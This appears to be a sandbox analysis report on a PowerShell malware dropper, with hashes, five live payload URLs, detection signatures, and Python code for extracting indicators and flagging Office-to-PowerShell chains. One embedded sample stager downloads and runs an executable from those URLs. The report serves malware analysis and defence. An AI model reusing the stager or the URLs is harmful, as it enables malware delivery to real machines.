General

  • Target

    02e541bb03899c2e0dc832cf6042fe2f_JaffaCakes118

  • Size

    138KB

  • Sample

    240427-k2edesfc39

  • MD5

    02e541bb03899c2e0dc832cf6042fe2f

  • SHA1

    15dfcf6865e0ea59c73a48a0fc60f6e73de484b0

  • SHA256

    a3ede90ae5fc65fda1dd1ee6bd6e0cc8ff9f6c2f976c9de8d1fe2c670e99fbc2

  • SHA512

    92ff22c35e4b103c00e84c6a466ac2b37c1398c733b4daff510f21a7b109c1b8239d6a72d2d261dd0439d92db9cb11c8be2adbf5489a01c44a94bdb05045a009

  • SSDEEP

    1536:mW81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadVWlPadqETqKngyl+a9:mW8GhDS0o9zTGOZD6EbzCdVcacETq

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (all of type exe.dropper)

    http://haitiexpressnews.com/axVVsl8C
    http://dentalimplantslondon.info/7MlH3wX
    http://duanguavietnam.com/flag/nRo9nop
    http://kowsarpipe.com/XrdcZl5H7Z
    http://www.acilevarkadasi.com/oNHf5D1hZB
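The extracted configuration is a list of five download URLs typed exe.dropper, which is what a PowerShell stager that tries each URL in turn until one serves the payload looks like once deobfuscated. As an added example (not the sandbox's extractor and not this sample's code), the script below pulls such URLs out of a deobfuscated downloader and normalizes them into blocklist-ready indicators. The PowerShell text embedded in it is constructed: it assumes the common '@'-joined URL list layout, and only the five URLs themselves come from this report.

```python
"""Pull download URLs out of a deobfuscated PowerShell dropper and turn them
into blocklist-ready indicators.

Added example, not the sandbox's extractor and not this sample's code. The
dropper text below is CONSTRUCTED: it assumes the common '@'-joined URL list
layout; only the five URLs are taken from the report.
"""
import re
from urllib.parse import urlsplit

# Constructed stand-in for the deobfuscated config (assumed layout).
DEOBFUSCATED_PS1 = r"""
$urls = 'http://haitiexpressnews.com/axVVsl8C@http://dentalimplantslondon.info/7MlH3wX@http://duanguavietnam.com/flag/nRo9nop@http://kowsarpipe.com/XrdcZl5H7Z@http://www.acilevarkadasi.com/oNHf5D1hZB'.Split('@');
$out = $env:TEMP + '\' + (Get-Random) + '.exe';
foreach ($u in $urls) {
    try { (New-Object System.Net.WebClient).DownloadFile($u, $out); Invoke-Item $out; break } catch {}
}
"""

# Stop at quotes, whitespace and '@' so each member of the joined list is
# captured on its own.
URL_RE = re.compile(r"https?://[^\s'\"@<>]+", re.IGNORECASE)


def extract_urls(script: str) -> list:
    """Download URLs in first-seen order, deduplicated."""
    seen, urls = set(), []
    for match in URL_RE.finditer(script):
        url = match.group(0).rstrip(".,;)")
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def defang(url: str) -> str:
    """Render the URL non-clickable: hxxp://host[.]tld/path. Only the host's
    dots are bracketed so the path stays searchable as-is."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    return f"{scheme}://{host}{parts.path}"


def blocklist_hosts(urls) -> list:
    """Distinct hostnames, lowercased, with a leading 'www.' stripped so one
    entry covers both forms of the same domain."""
    hosts = []
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        if host.startswith("www."):
            host = host[4:]
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def indicators(script: str) -> dict:
    """Everything a blocklist or hunt query needs from one deobfuscated dropper."""
    urls = extract_urls(script)
    return {
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "hosts": blocklist_hosts(urls),
    }


if __name__ == "__main__":
    for line in indicators(DEOBFUSCATED_PS1)["defanged"]:
        print(line)
```

The regex deliberately excludes `'`, `"` and `@` so that the joined string splits into its members without first evaluating the PowerShell; a stager that URL-encodes or concatenates the list in pieces would need the deobfuscation step the sandbox already performed before this extractor is useful.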

Targets

    • Target

      02e541bb03899c2e0dc832cf6042fe2f_JaffaCakes118

    • Size

      138KB

    • MD5

      02e541bb03899c2e0dc832cf6042fe2f

    • SHA1

      15dfcf6865e0ea59c73a48a0fc60f6e73de484b0

    • SHA256

      a3ede90ae5fc65fda1dd1ee6bd6e0cc8ff9f6c2f976c9de8d1fe2c670e99fbc2

    • SHA512

      92ff22c35e4b103c00e84c6a466ac2b37c1398c733b4daff510f21a7b109c1b8239d6a72d2d261dd0439d92db9cb11c8be2adbf5489a01c44a94bdb05045a009

    • SSDEEP

      1536:mW81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadVWlPadqETqKngyl+a9:mW8GhDS0o9zTGOZD6EbzCdVcacETq

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request
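The two signatures above describe a parent/child anomaly (an Office process launching a script host) followed by that child reaching the network. As an added example, not the sandbox's own rule logic, the following evaluates both conditions over constructed Sysmon-style process-create and network-connect events; the parent and child image lists, the network blocklist and the event records are assumptions chosen to mirror this report.

```python
"""Evaluate this report's two behavioural signatures over constructed
Sysmon-style events (process create = Event ID 1, network connect = Event ID 3).

Added example, not the sandbox's rule logic. The parent/child lists, the
network blocklist and the sample events are assumptions chosen to mirror the
report: an Office document handing off to a PowerShell downloader.
"""
from dataclasses import dataclass

# Parents that should never launch a script host or LOLBin (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Processes with no business reaching the network on a user workstation (assumed list).
NET_BLOCKLIST = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent_pid: int
    parent_image: str


@dataclass
class NetEvent:
    pid: int
    image: str
    dest_host: str
    dest_port: int


def basename(path: str) -> str:
    """Lower-cased image name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def unexpected_child(ev: ProcEvent) -> bool:
    """Signature: Office parent spawning a script host or LOLBin."""
    return (basename(ev.parent_image) in OFFICE_PARENTS
            and basename(ev.image) in SUSPICIOUS_CHILDREN)


def blocklisted_network(ev: NetEvent) -> bool:
    """Signature: a blocklisted image opened an outbound connection."""
    return basename(ev.image) in NET_BLOCKLIST


def evaluate(proc_events, net_events) -> list:
    """Return (signature, detail) pairs. A network hit from a pid that already
    tripped the parent/child check is marked high: together they are the
    macro-to-downloader chain behind this report's two signatures."""
    hits, flagged = [], set()
    for ev in proc_events:
        if unexpected_child(ev):
            flagged.add(ev.pid)
            hits.append(("Process spawned unexpected child process",
                         f"{basename(ev.parent_image)} -> {basename(ev.image)} (pid {ev.pid})"))
    for ev in net_events:
        if blocklisted_network(ev):
            sev = "high" if ev.pid in flagged else "medium"
            hits.append(("Blocklisted process makes network request",
                         f"{basename(ev.image)} (pid {ev.pid}) -> {ev.dest_host}:{ev.dest_port} [{sev}]"))
    return hits


# Constructed events. The destination host is the report's first exe.dropper URL host.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROC = [
    ProcEvent(1204, WINWORD, 812, r"C:\Windows\explorer.exe"),
    ProcEvent(3360, POWERSHELL, 1204, WINWORD),                                         # macro -> downloader
    ProcEvent(3400, r"C:\Windows\System32\cmd.exe", 812, r"C:\Windows\explorer.exe"),  # user shell, benign
]
SAMPLE_NET = [
    NetEvent(3360, POWERSHELL, "haitiexpressnews.com", 80),
    NetEvent(2200, r"C:\Program Files\Mozilla Firefox\firefox.exe", "example.org", 443),
]

if __name__ == "__main__":
    for sig, detail in evaluate(SAMPLE_PROC, SAMPLE_NET):
        print(f"{sig}: {detail}")
```

Keying the escalation on the pid rather than the image name is what separates the dropper from an administrator's interactive PowerShell: the latter also lands on the network blocklist, but it was spawned by explorer.exe and stays at medium.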

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic             Technique                       ID      Count
  Defense Evasion    Modify Registry                 T1112   1
  Discovery          Query Registry                  T1012   2
  Discovery          System Information Discovery    T1082   2
